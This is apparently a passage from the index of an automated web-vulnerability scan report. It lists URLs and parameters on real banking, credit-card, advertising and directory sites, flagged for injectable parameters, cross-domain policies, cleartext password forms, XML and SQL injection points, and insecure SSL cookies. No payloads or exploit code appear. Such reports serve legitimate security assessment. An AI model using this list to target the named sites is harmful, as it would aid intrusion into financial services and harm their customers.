4.516. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [REST URL parameter 3]

4.517. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

4.518. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [SRC parameter]

4.519. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [TR parameter]

4.520. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [bidType parameter]

4.521. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [lbp parameter]

4.522. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]

4.523. http://www.superpages.com/bp/xmlproxy [REST URL parameter 2]

4.524. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]

4.525. http://www.superpages.com/inc/social/sln.php [REST URL parameter 3]

4.526. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

4.527. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]

4.528. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

4.529. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]

4.530. http://www.thehealthreport.net/ac-usap.php [sub parameter]

4.531. http://www.us.hsbc.com/1/2/3 [hp_pref parameter]

4.532. http://www.us.hsbc.com/1/2/3/hsbcpremier/apply [code parameter]

4.533. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

4.534. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

4.535. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]

4.536. http://www201.americanexpress.com/business-credit-cards/ [inav parameter]

4.537. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]

4.538. http://www201.americanexpress.com/business-credit-cards/ [view-all-business-cards&inav parameter]

4.539. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

4.540. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

4.541. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

4.542. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

4.543. http://www201.americanexpress.com/getthecard/home [sj_tabToOpen parameter]

4.544. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 1]

4.545. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 2]

4.546. http://yellowpages.superpages.com/busprofile/css/busprofile.css [REST URL parameter 3]

4.547. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 1]

4.548. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 2]

4.549. http://yellowpages.superpages.com/busprofile/css/print.css [REST URL parameter 3]

4.550. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 1]

4.551. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 2]

4.552. http://yellowpages.superpages.com/busprofile/js/busprofile.js [REST URL parameter 3]

4.553. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 1]

4.554. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 2]

4.555. http://yellowpages.superpages.com/busprofile/js/csiframe.js [REST URL parameter 3]

4.556. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 1]

4.557. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 2]

4.558. http://yellowpages.superpages.com/busprofile/js/hide.js [REST URL parameter 3]

4.559. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 1]

4.560. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 2]

4.561. http://yellowpages.superpages.com/busprofile/js/photos.js [REST URL parameter 3]

4.562. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 1]

4.563. http://yellowpages.superpages.com/busprofile/script.more.js [REST URL parameter 2]

4.564. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 1]

4.565. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 2]

4.566. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 3]

4.567. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 1]

4.568. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 2]

4.569. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 3]

4.570. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 1]

4.571. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 2]

4.572. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 3]

4.573. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 1]

4.574. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 2]

4.575. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 3]

4.576. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 1]

4.577. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 2]

4.578. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 3]

4.579. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 1]

4.580. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 2]

4.581. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 3]

4.582. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 1]

4.583. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 2]

4.584. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 3]

4.585. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 1]

4.586. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 2]

4.587. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 3]

4.588. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 1]

4.589. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 2]

4.590. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 3]

4.591. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 1]

4.592. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 2]

4.593. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 3]

4.594. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 1]

4.595. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 2]

4.596. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 3]

4.597. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 1]

4.598. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 2]

4.599. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 3]

4.600. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 1]

4.601. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 2]

4.602. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 3]

4.603. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 1]

4.604. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 2]

4.605. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 3]

4.606. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 1]

4.607. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 2]

4.608. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 3]

4.609. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 1]

4.610. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 2]

4.611. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 3]

4.612. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 1]

4.613. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 2]

4.614. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 3]

4.615. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 1]

4.616. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 2]

4.617. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 3]

4.618. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 1]

4.619. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 2]

4.620. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 3]

4.621. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 1]

4.622. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 2]

4.623. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 3]

4.624. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 1]

4.625. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 2]

4.626. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 3]

4.627. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 1]

4.628. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 2]

4.629. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 3]

4.630. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 1]

4.631. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 2]

4.632. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 3]

4.633. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 1]

4.634. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 2]

4.635. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 3]

4.636. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 1]

4.637. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 2]

4.638. http://yellowpages.superpages.com/listings.jsp [C parameter]

4.639. http://yellowpages.superpages.com/listings.jsp [C parameter]

4.640. http://yellowpages.superpages.com/listings.jsp [REST URL parameter 1]

4.641. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]

4.642. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 1]

4.643. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 2]

4.644. http://yellowpages.superpages.com/profile.jsp [LID%3D parameter]

4.645. http://yellowpages.superpages.com/profile.jsp [REST URL parameter 1]

4.646. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]

4.647. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 1]

4.648. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 2]

4.649. http://yellowpages.superpages.com/profiler/abook.jsp [couponsLoc parameter]

4.650. http://yellowpages.superpages.com/profiler/abook.jsp [requestAction parameter]

4.651. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 1]

4.652. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 2]

4.653. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 3]

4.654. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 1]

4.655. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 2]

4.656. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 3]

4.657. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 1]

4.658. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 2]

4.659. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 1]

4.660. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 2]

4.661. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 3]

4.662. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 1]

4.663. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 2]

4.664. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 3]

4.665. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

4.666. http://www.accuweather.com/index-radar.asp [Referer HTTP header]

4.667. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]

4.668. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]

4.669. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]

4.670. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]

4.671. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]

4.672. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]

4.673. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]

4.674. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]

4.675. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]

4.676. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]

4.677. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]

4.678. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]

4.679. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]

4.680. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]

4.681. http://www.experts123.com/q/what-is-a-mortgage.html [Referer HTTP header]

4.682. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]

4.683. http://www.experts123.com/q/what-is-an-online-checking-account.html [Referer HTTP header]

4.684. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]

4.685. http://www.experts123.com/q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html [Referer HTTP header]

4.686. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]

4.687. http://www.experts123.com/q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html [Referer HTTP header]

4.688. http://www.experts123.com/questions/ask [Referer HTTP header]

4.689. http://www.experts123.com/questions/filter/bank [Referer HTTP header]

4.690. http://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

4.691. http://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]

4.692. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

4.693. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [User-Agent HTTP header]

4.694. http://www.us.hsbc.com/1/2/3 [Referer HTTP header]

4.695. http://bh.contextweb.com/bh/sync/admeld [V cookie]

4.696. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

4.697. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

4.698. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie]

4.699. http://da.newstogram.com/hg.php [DMUserTrack cookie]

4.700. http://gsbmtg.rtrk.com/ [RlocalUID cookie]

4.701. http://optimized-by.rubiconproject.com/a/6272/9319/15153-15.js [ruid cookie]

4.702. http://optimized-by.rubiconproject.com/a/6272/9319/15153-2.js [ruid cookie]

4.703. http://porscheusa.com/911GTS-mosaic [REST URL parameter 1]

4.704. http://porscheusa.com/911GTS-mosaic [name of an arbitrarily supplied request parameter]

4.705. http://s1.srtk.net/www/delivery/rd.php [trackerid parameter]

4.706. http://www.feedzilla.com/rss/flash_feed.asp [Cat2 parameter]

4.707. http://www.feedzilla.com/rss/flash_feed.asp [cat parameter]

5. Flash cross-domain policy

5.1. http://18.xg4ken.com/crossdomain.xml

5.2. https://220marketing9-px.rtrk.com/crossdomain.xml

5.3. http://69.16.184.135/crossdomain.xml

5.4. http://a.rfihub.com/crossdomain.xml

5.5. http://a.tribalfusion.com/crossdomain.xml

5.6. http://ad.br.doubleclick.net/crossdomain.xml

5.7. http://ad.doubleclick.net/crossdomain.xml

5.8. http://admin.brightcove.com/crossdomain.xml

5.9. http://ajax.googleapis.com/crossdomain.xml

5.10. http://api.feedzilla.com/crossdomain.xml

5.11. http://beacon.afy11.net/crossdomain.xml

5.12. http://c5.zedo.com/crossdomain.xml

5.13. http://c7.zedo.com/crossdomain.xml

5.14. http://dev.virtualearth.net/crossdomain.xml

5.15. https://graph.facebook.com/crossdomain.xml

5.16. http://gsbmtg.rtrk.com/crossdomain.xml

5.17. http://i1.ytimg.com/crossdomain.xml

5.18. http://lab.arc90.com/crossdomain.xml

5.19. http://loga2.doubleverify.com/crossdomain.xml

5.20. http://motifcdn2.doubleclick.net/crossdomain.xml

5.21. http://netweather.accuweather.com/crossdomain.xml

5.22. http://news.feedzilla.com/crossdomain.xml

5.23. http://omnituretrack.local.com/crossdomain.xml

5.24. http://questionmarket.com/crossdomain.xml

5.25. http://rtsys.reachlocal.com/crossdomain.xml

5.26. http://rtsys.rtrk.com/crossdomain.xml

5.27. http://s.ytimg.com/crossdomain.xml

5.28. http://s0.2mdn.net/crossdomain.xml

5.29. http://s1.srtk.net/crossdomain.xml

5.30. http://tags.crwdcntrl.net/crossdomain.xml

5.31. http://vortex.accuweather.com/crossdomain.xml

5.32. http://weather.weatherbug.com/crossdomain.xml

5.33. http://www.accuweather.com/crossdomain.xml

5.34. http://www1.member-hsbc-group.com/crossdomain.xml

5.35. http://xads.zedo.com/crossdomain.xml

5.36. http://ziggymedia.go2cloud.org/crossdomain.xml

5.37. http://api.bing.com/crossdomain.xml

5.38. http://clicks.superpages.com/crossdomain.xml

5.39. https://imgssl.superpages.com/crossdomain.xml

5.40. http://media.superpages.com/crossdomain.xml

5.41. http://static.ak.fbcdn.net/crossdomain.xml

5.42. http://us.rd.yahoo.com/crossdomain.xml

5.43. http://www.apple.com/crossdomain.xml

5.44. http://advertising.microsoft.com/crossdomain.xml

5.45. http://citi.bridgetrack.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.br.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad.doubleclick.net/clientaccesspolicy.xml

6.3. http://dev.virtualearth.net/clientaccesspolicy.xml

6.4. http://omnituretrack.local.com/clientaccesspolicy.xml

6.5. http://s0.2mdn.net/clientaccesspolicy.xml

6.6. http://api.bing.com/clientaccesspolicy.xml

6.7. http://www.microsoft.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania

7.2. http://forums.accuweather.com/

7.3. http://lists.arin.net/mailman/listinfo/arin-tech-discuss

7.4. http://online.barrons.com/article/SB50001424052970203537304576017783391376872.html

7.5. http://thestreet.adsonar.com/admin/advertisers/indexPl.jsp

7.6. http://www.local.com/

7.7. http://www.local.com/business/

7.8. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/

7.9. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/

7.10. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/

7.11. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/

7.12. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/

7.13. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/

7.14. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/

7.15. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/

7.16. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/

7.17. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/

7.18. http://www.local.com/business/results/

7.19. http://www.local.com/contact.aspx

7.20. http://www.local.com/coupons/

7.21. http://www.local.com/coupons/printable/

7.22. http://www.local.com/dialogs/register.aspx

7.23. http://www.local.com/events/

7.24. http://www.local.com/events/category/music/dallas-tx.aspx

7.25. http://www.local.com/events/category/performing-arts/dallas-tx.aspx

7.26. http://www.local.com/events/category/sports/dallas-tx.aspx

7.27. http://www.local.com/faq.aspx

7.28. http://www.local.com/privacy/

7.29. http://www.local.com/results.aspx

7.30. http://www.local.com/results/

7.31. http://www.local.com/sitemap.aspx

7.32. http://www.local.com/sitemap/chicago-il.aspx

7.33. http://www.local.com/sitemap/los-angeles-ca.aspx

7.34. http://www.local.com/sitemap/new-york-ny.aspx

7.35. http://www.local.com/terms/

7.36. http://www.local.com/topics/

7.37. http://www.sipc.org/

7.38. http://www.sipc.org/index.cfm

7.39. http://www.supermedia.com/

8. XML injection

8.1. http://a.dlqm.net/adscgen/log_ut_err.php [REST URL parameter 1]

8.2. http://a.dlqm.net/adscgen/log_ut_err.php [REST URL parameter 2]

8.3. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]

8.4. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

8.5. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 1]

8.6. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 2]

8.7. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 3]

8.8. http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2796.js [REST URL parameter 4]

8.9. http://loadus.exelator.com/load/ [REST URL parameter 1]

8.10. http://loadus.exelator.com/load/net.php [REST URL parameter 1]

8.11. http://loadus.exelator.com/load/net.php [REST URL parameter 2]

8.12. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css [REST URL parameter 2]

8.13. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css [REST URL parameter 3]

8.14. http://s.ytimg.com/yt/jsbin/www-embed-vfl4nNnFQ.js [REST URL parameter 2]

8.15. http://s.ytimg.com/yt/jsbin/www-embed-vfl4nNnFQ.js [REST URL parameter 3]

8.16. http://urlwww--feedzilla--com.rtrk.com/tools/hcc.asp [REST URL parameter 1]

8.17. http://urlwww--feedzilla--com.rtrk.com/tools/swfobject.js [REST URL parameter 1]

8.18. http://weather.weatherbug.com/ [zip parameter]

8.19. http://www.myfinances.com/solo [REST URL parameter 1]

8.20. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 1]

8.21. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 2]

8.22. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 3]

9. SQL statement in request parameter

9.1. https://app.insightgrit.com/1/nat

9.2. https://app.insightgrit.com/Visit37.php

9.3. https://www.supermedia.com/spportal/spportalFlow.do

10. SSL cookie without secure flag set

10.1. https://220marketing9-px.rtrk.com/

10.2. https://app.insightgrit.com/Visit37.php

10.3. https://cibng.ibanking-services.com/cib/CEBMainServlet/Login

10.4. https://icapture.regions.com/

10.5. https://mappoint-css.live.com/mwssignup/

10.6. https://mymortgage.regionsmortgage.com/upmb/disp

10.7. https://online.americanexpress.com/myca/fuidfyp/us/action

10.8. https://online.americanexpress.com/myca/logon/us/action

10.9. https://online.americanexpress.com/myca/ocareg/us/action

10.10. https://onlineimagelockbox.regions.com/

10.11. https://profile.microsoft.com/RegSysProfileCenter/default.aspx

10.12. https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm

10.13. https://secure.opinionlab.com/comment20AMX.asp

10.14. https://secure.thepaymentwindow.com/epayments/default.asp

10.15. https://securebank.regions.com/ForgottenPassword.aspx

10.16. https://securebank.regions.com/login.aspx

10.17. https://www.consumercardaccess.com/main/spectrum/Home

10.18. https://www.morgankeegan.com/ca/mkca.aspx

10.19. https://www.planservices.com/regions/

10.20. https://www.regions.com/personal_banking.rf

10.21. https://www.sponsorinsight.com/regions/index.cfm

10.22. https://www.suntrust.com/portal/server.pt

10.23. https://www124.americanexpress.com/cards/benefits/

10.24. https://www201.americanexpress.com/MobileWeb/index.jsp

10.25. https://www201.americanexpress.com/cards/DecodeServlet

10.26. https://www201.americanexpress.com/secure/my-special-offers

10.27. https://www201.americanexpress.com/smsweb/un_Landing.do

10.28. https://www209.americanexpress.com/merchant/marketing-data/pages/home

10.29. https://www212.americanexpress.com/dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do

10.30. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

10.31. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

10.32. https://www212.americanexpress.com/dsmlive/dsm/int/contactus/personalcards.do

10.33. https://www212.americanexpress.com/dsmlive/dsm/int/us/en/cmaproductspage.do

10.34. https://www213.americanexpress.com/PowerLabsWeb/un/landingpage.htm

10.35. https://www257.americanexpress.com/openhome/smallbusiness.do

10.36. https://www295.americanexpress.com/cards/home.do

10.37. https://www295.americanexpress.com/entertainmentaccess/home.do

10.38. https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do

10.39. https://www295.americanexpress.com/premium/credit-report-monitoring/enquiry.do

10.40. https://www3.citizensbankonline.com/efs/servlet/efs/default.jsp

10.41. https://www3.citizensbankonline.com/efs/servlet/efs/enter-password-help.jsp

10.42. https://www3.citizensbankonline.com/efs/servlet/efs/invalidate.jsp

10.43. https://www3.citizensbankonline.com/efs/servlet/efs/login.jsp

10.44. https://www3.citizensbankonline.com/efs/servlet/efs/secure-login-help.jsp

10.45. https://www3.citizensbankonline.com/efs/servlet/efs/wait.jsp

10.46. https://ad.doubleclick.net/activity

10.47. https://axptravel.americanexpress.com/consumertravel/travel.do

10.48. https://easyview.us.hsbc.com/yodlee_index.html

10.49. https://espanol.regions.com/regions/enes/24/_

10.50. https://expresstradelc.regions.com/icc

10.51. https://feedback.live.com/default.aspx

10.52. https://home.americanexpress.com/home/corporations.shtml

10.53. https://home.americanexpress.com/home/global_splash.html

10.54. https://home.americanexpress.com/home/js/ad_login.js

10.55. https://home.americanexpress.com/home/mt_personal.shtml

10.56. https://home.americanexpress.com/home/pz/pes_basic.js

10.57. https://home.americanexpress.com/home/pz/pes_login.js

10.58. https://itreasury.regions.com/

10.59. https://labs.wellsfargo.com/rapidalerts/

10.60. https://online.americanexpress.com/myca/acctsumm/us/action

10.61. https://online.bbandt.com/online/selfservice/main.do

10.62. https://online.bbandt.com/online/selfservice/main.do

10.63. https://online.wellsfargo.com/das/channel/enrollDisplay

10.64. https://online.wellsfargo.com/signon

10.65. https://onlineservices.wachovia.com/auth/AuthService

10.66. https://payroll.regions.com/servlet/gateway

10.67. https://pfo.us.hsbc.com/hsbcpb/

10.68. https://quickaccount.us.hsbc.com/jsp/oao/relc/cashedge/oao_application_retrieve.jsp

10.69. https://sales.liveperson.net/hc/13041680/

10.70. https://sslgypsy-test.superpages.com/

10.71. https://tokens.regions.com/

10.72. https://redcated/jaction/00asup_RetargetingSecure_1

10.73. https://vms.boldchat.com/aid/3760177095415339810/bc.pv

10.74. https://www.americanexpress.com/airlines-credit-card/

10.75. https://www.americanexpress.com/credit-card-rewards/

10.76. https://www.americanexpress.com/gift/giftcardslanding.shtml

10.77. https://www.americanexpress.com/gold-card/

10.78. https://www.americanexpress.com/no-annual-fee-credit-cards/

10.79. https://www.banking.us.hsbc.com/HICServlet

10.80. https://www.mystreetscape.com/my/citizensinvest

10.81. https://www.openforum.com/

10.82. https://www.regions.com/

10.83. https://www.regions.com/App_Themes/Default/img/arrowGray_Small.gif

10.84. https://www.regions.com/App_Themes/Default/img/arrowOrange.gif

10.85. https://www.regions.com/App_Themes/Default/img/bgDot.gif

10.86. https://www.regions.com/App_Themes/Default/img/logoEqualHousingLender.gif

10.87. https://www.regions.com/App_Themes/Default/screen.css

10.88. https://www.regions.com/Contact.rf

10.89. https://www.regions.com/FAQ/insured_deposits.rf

10.90. https://www.regions.com/GoogleSearch.rf

10.91. https://www.regions.com/Locator.rf

10.92. https://www.regions.com/Rates.rf

10.93. https://www.regions.com/about_regions.rf

10.94. https://www.regions.com/about_regions/economic_update.rf

10.95. https://www.regions.com/commercial_banking.rf

10.96. https://www.regions.com/favicon.ico

10.97. https://www.regions.com/img/btnDownArrow.gif

10.98. https://www.regions.com/img/btnRightArrow.gif

10.99. https://www.regions.com/img/left.gif

10.100. https://www.regions.com/img/logoRegions_213x45.gif

10.101. https://www.regions.com/js/loadMedia.js

10.102. https://www.regions.com/js/wtbase.js

10.103. https://www.regions.com/mortgage.rf

10.104. https://www.regions.com/personal_banking/alternative_education_loans.rf

10.105. https://www.regions.com/personal_banking/auto_loans.rf

10.106. https://www.regions.com/personal_banking/cds.rf

10.107. https://www.regions.com/personal_banking/checking.rf

10.108. https://www.regions.com/personal_banking/credit_cards.rf

10.109. https://www.regions.com/personal_banking/ehl.rf

10.110. https://www.regions.com/personal_banking/email_starting_net.rf

10.111. https://www.regions.com/personal_banking/everyday_banking.rf

10.112. https://www.regions.com/personal_banking/get_started_online_statements.rf

10.113. https://www.regions.com/personal_banking/home_equity_main.rf

10.114. https://www.regions.com/personal_banking/insurance.rf

10.115. https://www.regions.com/personal_banking/investing.rf

10.116. https://www.regions.com/personal_banking/loan_payment_hardship.rf

10.117. https://www.regions.com/personal_banking/loans_credit.rf

10.118. https://www.regions.com/personal_banking/mobile_banking.rf

10.119. https://www.regions.com/personal_banking/money_market_main.rf

10.120. https://www.regions.com/personal_banking/morgan_keegan.rf

10.121. https://www.regions.com/personal_banking/open_account.rf

10.122. https://www.regions.com/personal_banking/platinum_visa_check.rf

